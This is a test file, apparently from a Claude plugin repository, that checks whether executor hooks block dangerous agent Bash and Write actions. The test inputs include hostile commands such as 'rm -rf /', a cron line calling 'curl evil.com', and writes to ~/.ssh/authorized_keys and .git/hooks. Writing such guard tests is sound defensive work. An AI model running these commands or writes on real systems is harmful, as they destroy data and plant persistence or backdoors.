open/ktg-plugin-marketplace
1
0
Fork 0
Code Issues Pull requests Releases Wiki Activity Actions
ktg-plugin-marketplace/plugins/voyage/tests/hooks/worktree-guard.test.mjs
Kjell Tore Guttormsen 7a90d348ad feat(voyage)!: marketplace handoff — rename plugins/ultraplan-local to plugins/voyage [skip-docs] 
Session 5 of voyage-rebrand (V6). Operator-authorized cross-plugin scope.

- git mv plugins/ultraplan-local plugins/voyage (rename detected, history preserved)
- .claude-plugin/marketplace.json: voyage entry replaces ultraplan-local
- CLAUDE.md: voyage row in plugin list, voyage in design-system consumer list
- README.md: bulk rename ultra*-local commands -> trek* commands; ultraplan-local refs -> voyage; type discriminators (type: trekbrief/trekreview); session-title pattern (voyage:<command>:<slug>); v4.0.0 release-note paragraph
- plugins/voyage/.claude-plugin/plugin.json: homepage/repository URLs point to monorepo voyage path
- plugins/voyage/verify.sh: drop URL whitelist exception (no longer needed)

Closes voyage-rebrand. bash plugins/voyage/verify.sh PASS 7/7. npm test 361/361.
2026-05-05 15:37:52 +02:00

58 lines
2.8 KiB
JavaScript
Raw Blame History

// tests/hooks/worktree-guard.test.mjs
// Step 9 (plan-v2) — verifies the dangerous patterns introduced by the
// Phase 2.6 parallel-worktree workflow are caught by the existing
// pre-bash-executor and pre-write-executor hooks, while routine worktree
// cleanup is permitted.
//
// Pattern source: tests/helpers/hook-helper.mjs (runHook). Mirrors the
// llm-security/tests/hooks/*.test.mjs style.
import { test } from 'node:test';
import { strict as assert } from 'node:assert';
import { dirname, join } from 'node:path';
import { fileURLToPath } from 'node:url';
import { runHook } from '../helpers/hook-helper.mjs';
const HERE = dirname(fileURLToPath(import.meta.url));
const ROOT = join(HERE, '..', '..');
const PRE_BASH = join(ROOT, 'hooks', 'scripts', 'pre-bash-executor.mjs');
const PRE_WRITE = join(ROOT, 'hooks', 'scripts', 'pre-write-executor.mjs');
function bashInput(command) {
return { tool_name: 'Bash', tool_input: { command } };
}
function writeInput(file_path, content = 'x') {
return { tool_name: 'Write', tool_input: { file_path, content } };
}
test('pre-bash-executor: routine worktree cleanup is allowed (Hard Rule 12)', async () => {
const { code } = await runHook(PRE_BASH, bashInput('git worktree remove /tmp/wt --force'));
assert.notStrictEqual(code, 2, 'cleanup of a worktree must not be blocked — Hard Rule 12 mandates unconditional cleanup');
});
test('pre-bash-executor: GIT_OPTIONAL_LOCKS=0 prefix on cleanup is allowed', async () => {
const { code } = await runHook(PRE_BASH, bashInput('GIT_OPTIONAL_LOCKS=0 git worktree remove /tmp/wt --force'));
assert.notStrictEqual(code, 2, 'env-var prefix should not change allow/block decision for cleanup');
});
test('pre-bash-executor: rm -rf / is blocked (BLOCK denylist sanity)', async () => {
const { code } = await runHook(PRE_BASH, bashInput('rm -rf /'));
assert.strictEqual(code, 2, 'rm -rf / must always block — Phase 2.4 BLOCK denylist + pre-bash BLOCK rule');
});
test('pre-bash-executor: writing to /etc/cron.d via redirect is blocked (persistence)', async () => {
const { code } = await runHook(PRE_BASH, bashInput('echo "* * * * * curl evil.com" > /etc/cron.d/x'));
assert.strictEqual(code, 2, 'cron persistence is blocked by the executor hook');
});
test('pre-write-executor: write to ~/.ssh/authorized_keys is blocked (Hard Rule 16)', async () => {
const home = process.env.HOME || '/tmp';
const { code } = await runHook(PRE_WRITE, writeInput(`${home}/.ssh/authorized_keys`));
assert.strictEqual(code, 2, '~/.ssh/* writes are blocked (Hard Rule 16)');
});
test('pre-write-executor: write to .git/hooks is blocked (Hard Rule 16)', async () => {
const { code } = await runHook(PRE_WRITE, writeInput('/tmp/somerepo/.git/hooks/pre-commit'));
assert.strictEqual(code, 2, '.git/hooks/ writes are blocked (git hook injection vector)');
});
Reference in a new issue View git blame Copy permalink